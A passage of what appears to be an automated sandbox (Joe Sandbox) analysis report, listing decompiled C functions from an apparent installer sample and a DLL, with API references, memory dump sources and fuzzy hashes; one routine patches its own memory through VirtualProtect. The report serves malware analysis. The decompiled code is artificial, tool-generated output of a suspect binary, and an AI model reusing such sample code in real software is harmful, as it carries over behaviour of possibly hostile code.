                                                                                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                                                                                            • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                                                                                                                            • Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 687E2A7F Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x687e5048 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x687e505c, 4, 0x40, 0x687e504c); // executed
					 *0x687e505c = 0xc2;
					 *0x687e504c = 0;
					 *0x687e5054 = 0;
					 *0x687e5068 = 0;
					 *0x687e5058 = 0;
					 *0x687e5050 = 0;
					 *0x687e5060 = 0;
					 *0x687e505e = 0;
				}
				return 1;
			}



                                                                                                                                                                                                                            0x687e2a88
                                                                                                                                                                                                                            0x687e2a8d
                                                                                                                                                                                                                            0x687e2a9d
                                                                                                                                                                                                                            0x687e2aa5
                                                                                                                                                                                                                            0x687e2aac
                                                                                                                                                                                                                            0x687e2ab1
                                                                                                                                                                                                                            0x687e2ab6
                                                                                                                                                                                                                            0x687e2abb
                                                                                                                                                                                                                            0x687e2ac0
                                                                                                                                                                                                                            0x687e2ac5
                                                                                                                                                                                                                            0x687e2aca
                                                                                                                                                                                                                            0x687e2aca
                                                                                                                                                                                                                            0x687e2ad2

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • VirtualProtect.KERNELBASE(687E505C,00000004,00000040,687E504C), ref: 687E2A9D
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.533272603.00000000687E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 687E0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.533258912.00000000687E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.533285337.00000000687E4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.533299887.00000000687E6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_687e0000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ProtectVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 544645111-0
                                                                                                                                                                                                                            • Opcode ID: fa00fcbb7038aa385c86e1e9a74fb0961b66c6a736ec790140fac82801915ee2
                                                                                                                                                                                                                            • Instruction ID: 522c483f972c688362ce4ea6de88505e697abca1d8bf117a53985c7c2472a3fd
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fa00fcbb7038aa385c86e1e9a74fb0961b66c6a736ec790140fac82801915ee2
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 19F0AEB0A44288DFCBA0CF38E54C70D3BE0B70A314B54457AF2B8D6280E3744144DBA1
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004064D5 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004064D5(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406454(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}






                                                                                                                                                                                                                            0x004064df
                                                                                                                                                                                                                            0x004064e6
                                                                                                                                                                                                                            0x004064f9
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004064f9
                                                                                                                                                                                                                            0x004064ea
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406563,?,00000000,?,?,Call,?), ref: 004064F9
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Open
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 71445658-0
                                                                                                                                                                                                                            • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                                                                                                                                                            • Instruction ID: 5036765eb4ab6e58186d81024f5778724aa2024cd81e2e1d5ca813995cf5404a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BAD0123210020DBBDF115F90AD01FAB375DAB08310F018426FE06A4092D775D534A728
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004015A3() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesW(E00402DA6(0xfffffff0),  *(_t11 - 0x2c)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}






                                                                                                                                                                                                                            0x004015ae
                                                                                                                                                                                                                            0x004015b4
                                                                                                                                                                                                                            0x004015b6
                                                                                                                                                                                                                            0x0040292e
                                                                                                                                                                                                                            0x0040292e
                                                                                                                                                                                                                            0x00402c2d
                                                                                                                                                                                                                            0x00402c39

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                            • Opcode ID: 3f67fddbcb2c4727b19cad364a98ff9d03893c5cf97898e6ee5a661b68cffc78
                                                                                                                                                                                                                            • Instruction ID: 77b6755767f32433cbba579d7de441064f90f02de732d0e129c6c43bd553ff67
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3f67fddbcb2c4727b19cad364a98ff9d03893c5cf97898e6ee5a661b68cffc78
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F6D0C772B08100DBDB11DBA8AA08B8D73A0AB00328B208537D001F21D0E6B8C8469A2E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00404610 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00404610(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x429238;
				if(_t2 != 0) {
					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}





                                                                                                                                                                                                                            0x00404610
                                                                                                                                                                                                                            0x00404617
                                                                                                                                                                                                                            0x00404622
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00404622
                                                                                                                                                                                                                            0x00404628

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                                            • Opcode ID: 8557fc69485774ba4641c6a2d2b4437b1a5152abf7221d5f63999a85994ee7b6
                                                                                                                                                                                                                            • Instruction ID: 1d0f09303225af8c469e983b8f6ba21d59f3f36861eec243a4bc5be8392dea83
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8557fc69485774ba4641c6a2d2b4437b1a5152abf7221d5f63999a85994ee7b6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9EC09B71741700FBDE209B509F45F077794A754701F154979B741F60E0D775D410D62D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004035F8 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004035F8(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                                                                                                                                                                                            0x00403606
                                                                                                                                                                                                                            0x0040360c

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FilePointer
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 973152223-0
                                                                                                                                                                                                                            • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                                                                                                                            • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004045F9 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004045F9(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x42a268, 0x28, _a4, 1); // executed
				return _t2;
			}




                                                                                                                                                                                                                            0x00404607
                                                                                                                                                                                                                            0x0040460d

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                                            • Opcode ID: 70666cfd2db8a5712e0e3ed728d50a5e19955e25533eceda6abdc0f56bdf790a
                                                                                                                                                                                                                            • Instruction ID: 26063d6d883ff380d2e1d7f9fe2b9d631bf033e6200e0a233fd0d302f8c02db7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 70666cfd2db8a5712e0e3ed728d50a5e19955e25533eceda6abdc0f56bdf790a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5BB01235286A00FBDE614B00DE09F457E62F764B01F048078F741240F0CAB300B5DF19
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004045E6 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004045E6(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x423744, _a4); // executed
				return _t2;
			}




                                                                                                                                                                                                                            0x004045f0
                                                                                                                                                                                                                            0x004045f6

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,004043BD), ref: 004045F0
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2492992576-0
                                                                                                                                                                                                                            • Opcode ID: b9cabee76f1705efe6df0b682491f715d60f75bd340f366a7093c5de42737780
                                                                                                                                                                                                                            • Instruction ID: 97f05af551d2e904d84950d91e3a9b28448307360fbef328a82585e9573e9e03
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b9cabee76f1705efe6df0b682491f715d60f75bd340f366a7093c5de42737780
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DBA001B6604500ABDE129F61EF09D0ABB72EBA4B02B418579A28590034CA365961FB1D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 687E2B98 Relevance: 1.4, APIs: 1, Instructions: 143COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                                                                                            			E687E2B98(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t28;
				void* _t29;
				int _t33;
				void* _t37;
				void* _t40;
				void* _t45;
				void* _t49;
				signed int _t56;
				void* _t61;
				void* _t70;
				intOrPtr _t72;
				signed int _t77;
				intOrPtr _t79;
				intOrPtr _t80;
				void* _t81;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				intOrPtr _t93;
				intOrPtr _t94;

				if( *0x687e5050 != 0 && E687E2ADB(_a4) == 0) {
					 *0x687e5054 = _t93;
					if( *0x687e504c != 0) {
						_t93 =  *0x687e504c;
					} else {
						E687E30C0(E687E2AD5(), __ecx);
						 *0x687e504c = _t93;
					}
				}
				_t28 = E687E2B09(_a4);
				_t94 = _t93 + 4;
				if(_t28 <= 0) {
					L9:
					_t29 = E687E2AFD();
					_t72 = _a4;
					_t79 =  *0x687e5058;
					 *((intOrPtr*)(_t29 + _t72)) = _t79;
					 *0x687e5058 = _t72;
					E687E2AF7();
					_t33 = CloseHandle(??); // executed
					 *0x687e5034 = _t33;
					 *0x687e5038 = _t79;
					if( *0x687e5050 != 0 && E687E2ADB( *0x687e5058) == 0) {
						 *0x687e504c = _t94;
						_t94 =  *0x687e5054;
					}
					_t80 =  *0x687e5058;
					_a4 = _t80;
					 *0x687e5058 =  *((intOrPtr*)(E687E2AFD() + _t80));
					_t37 = E687E2AE9(_t80);
					_pop(_t81);
					if(_t37 != 0) {
						_t40 = E687E2B09(_t81);
						if(_t40 > 0) {
							_push(_t40);
							_push(E687E2B14() + _a4 + _v8);
							_push(E687E2B1E());
							if( *0x687e5050 <= 0 || E687E2ADB(_a4) != 0) {
								_pop(_t88);
								_pop(_t45);
								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
								if(__eflags == 0) {
								}
								asm("loop 0xfffffff5");
							} else {
								_pop(_t89);
								_pop(_t49);
								 *0x687e504c =  *0x687e504c +  *(_t89 + _t49) * 4;
								asm("loop 0xffffffeb");
							}
						}
					}
					_t107 =  *0x687e5058;
					if( *0x687e5058 == 0) {
						 *0x687e504c = 0;
					}
					E687E2B42(_t107, _a4,  *0x687e5034,  *0x687e5038);
					return _a4;
				}
				_push(E687E2B14() + _a4);
				_t56 = E687E2B1A();
				_v8 = _t56;
				_t77 = _t28;
				_push(_t68 + _t56 * _t77);
				_t70 = E687E2B26();
				_t87 = E687E2B22();
				_t90 = E687E2B1E();
				_t61 = _t77;
				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
					_push( *((intOrPtr*)(_t70 + _t61)));
				}
				_push( *((intOrPtr*)(_t87 + _t61)));
				asm("loop 0xfffffff1");
				goto L9;
			}

























                                                                                                                                                                                                                            0x687e2ba8
                                                                                                                                                                                                                            0x687e2bb9
                                                                                                                                                                                                                            0x687e2bc6
                                                                                                                                                                                                                            0x687e2bda
                                                                                                                                                                                                                            0x687e2bc8
                                                                                                                                                                                                                            0x687e2bcd
                                                                                                                                                                                                                            0x687e2bd2
                                                                                                                                                                                                                            0x687e2bd2
                                                                                                                                                                                                                            0x687e2bc6
                                                                                                                                                                                                                            0x687e2be3
                                                                                                                                                                                                                            0x687e2be8
                                                                                                                                                                                                                            0x687e2bee
                                                                                                                                                                                                                            0x687e2c32
                                                                                                                                                                                                                            0x687e2c32
                                                                                                                                                                                                                            0x687e2c37
                                                                                                                                                                                                                            0x687e2c3c
                                                                                                                                                                                                                            0x687e2c42
                                                                                                                                                                                                                            0x687e2c44
                                                                                                                                                                                                                            0x687e2c4a
                                                                                                                                                                                                                            0x687e2c57
                                                                                                                                                                                                                            0x687e2c59
                                                                                                                                                                                                                            0x687e2c5e
                                                                                                                                                                                                                            0x687e2c6b
                                                                                                                                                                                                                            0x687e2c7e
                                                                                                                                                                                                                            0x687e2c84
                                                                                                                                                                                                                            0x687e2c8a
                                                                                                                                                                                                                            0x687e2c8b
                                                                                                                                                                                                                            0x687e2c91
                                                                                                                                                                                                                            0x687e2c9d
                                                                                                                                                                                                                            0x687e2ca3
                                                                                                                                                                                                                            0x687e2cab
                                                                                                                                                                                                                            0x687e2cac
                                                                                                                                                                                                                            0x687e2caf
                                                                                                                                                                                                                            0x687e2cba
                                                                                                                                                                                                                            0x687e2cbc
                                                                                                                                                                                                                            0x687e2cc8
                                                                                                                                                                                                                            0x687e2cce
                                                                                                                                                                                                                            0x687e2cd6
                                                                                                                                                                                                                            0x687e2d02
                                                                                                                                                                                                                            0x687e2d03
                                                                                                                                                                                                                            0x687e2d05
                                                                                                                                                                                                                            0x687e2d09
                                                                                                                                                                                                                            0x687e2d09
                                                                                                                                                                                                                            0x687e2d10
                                                                                                                                                                                                                            0x687e2ce6
                                                                                                                                                                                                                            0x687e2ce6
                                                                                                                                                                                                                            0x687e2ce7
                                                                                                                                                                                                                            0x687e2cf5
                                                                                                                                                                                                                            0x687e2cfe
                                                                                                                                                                                                                            0x687e2cfe
                                                                                                                                                                                                                            0x687e2cd6
                                                                                                                                                                                                                            0x687e2cba
                                                                                                                                                                                                                            0x687e2d12
                                                                                                                                                                                                                            0x687e2d19
                                                                                                                                                                                                                            0x687e2d1b
                                                                                                                                                                                                                            0x687e2d1b
                                                                                                                                                                                                                            0x687e2d34
                                                                                                                                                                                                                            0x687e2d42
                                                                                                                                                                                                                            0x687e2d42
                                                                                                                                                                                                                            0x687e2bf9
                                                                                                                                                                                                                            0x687e2bfa
                                                                                                                                                                                                                            0x687e2bff
                                                                                                                                                                                                                            0x687e2c03
                                                                                                                                                                                                                            0x687e2c08
                                                                                                                                                                                                                            0x687e2c1c
                                                                                                                                                                                                                            0x687e2c1d
                                                                                                                                                                                                                            0x687e2c1e
                                                                                                                                                                                                                            0x687e2c20
                                                                                                                                                                                                                            0x687e2c25
                                                                                                                                                                                                                            0x687e2c27
                                                                                                                                                                                                                            0x687e2c27
                                                                                                                                                                                                                            0x687e2c2a
                                                                                                                                                                                                                            0x687e2c30
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(00000000), ref: 687E2C57
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.533272603.00000000687E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 687E0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.533258912.00000000687E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.533285337.00000000687E4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.533299887.00000000687E6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_687e0000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2962429428-0
                                                                                                                                                                                                                            • Opcode ID: 8e5a2dc8e97f5121f547a3fd27cce723003b5da521db6208ede05c4cdcda2bab
                                                                                                                                                                                                                            • Instruction ID: 2d901b8192490572888a47ddd232fc987996ffb3fac81da3ba11f3f8a509879b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8e5a2dc8e97f5121f547a3fd27cce723003b5da521db6208ede05c4cdcda2bab
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A416C7691420AEBDB20DF74EA8DB6D3775EB4E318FA08436F914CB110E73895819BB1
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 78%
                                                                                                                                                                                                                            			E00401FA4(void* __ecx) {
				void* _t9;
				intOrPtr _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t17 = __ecx;
				_t19 = E00402DA6(_t15);
				E004056CA(0xffffffeb, _t7); // executed
				_t9 = E00405C4B(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
						_t13 = E00406AE0(_t17, _t20);
						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E004065AF( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t22 - 4));
